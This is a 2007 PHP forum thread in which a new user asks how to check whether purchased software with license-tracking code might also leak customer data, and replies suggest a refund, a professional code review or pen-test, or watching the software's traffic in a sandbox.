Page 1 of 1
Privacy leaks(?)
Posted: Tue Jan 23, 2007 9:13 pm
by jr_barnes1980
Hello folks. I'm very new to PHP but it seems to be a pretty cool coding system.
Here is my problem: I purchased a program written in php, but failed to read their EULA which says they have written coding into the software that tracks where it is located. They say this is so they can ensure that it is only used on one site - since I only purchased one license. That, per se, isn't a huge deal really. I'm not a thief or I wouldn't have paid for the software. What concerns me is "What if they have written in other code that compromises my potential customers private information?"
Since PHP is new to me can someone give me an idea of what coding I might look for to ensure that private information isn't sent back to their server?
Thank you.
JRB
Posted: Tue Jan 23, 2007 9:16 pm
by Kieran Huggins
If you don't feel confident, don't use the software. Ask for a refund.
Posted: Wed Jan 24, 2007 4:57 am
by Mordred
"What if they have written in other code that compromises my potential customers private information?"
This (or worse) is valid for every application you use. If it were open source, and mature enough, the community behind it would have most likely weeded out most security problems, intentionally introduced or not. As it is, you have the option of paying for a pen-test or - if the code is available - a code review. This should be done by a competent professional, you as a PHP newbie (no offense) have little chance in finding all the potential problems - check the obfuscated PHP code contenst in the general forum AND the numerous security and code reviews done around here.
Pen-Test
Posted: Wed Jan 24, 2007 4:06 pm
by jr_barnes1980
No offense taken Mordred. Thanks for the advise. I considered going to the local university's computer department and seeing if one of their computer science majors could look at it for me, but they don't have any classes on PHP. They do have classes on Java, C++ and a few other languages; how close to PHP do these languages resemble and would they be able to track it down. Any suggestions as to where I can look to find someone that would know what they are looking for and can tell me if the software is compromised?
Another idea I had was to use the search function on Windows and look for words in the files that might hint at a backdoor into it - the problem is that I don't know what type of coding to look for - any suggestions?
Thanks for the help folks. Any other suggestions will be greatly appreciated.
JRB
Posted: Wed Jan 24, 2007 6:09 pm
by Kieran Huggins
It's probably well buried to avoid detection.
I figure it boils down to this: You either trust them or you don't. If you don't trust them, don't run their code. Period.
Posted: Wed Jan 24, 2007 11:34 pm
by feyd
You could always set up their code in a sandbox and monitor the communications the box attempts to send to other resources.. but if you're getting into that, it's probably better (and less time consuming) to use another, more trustworthy, product.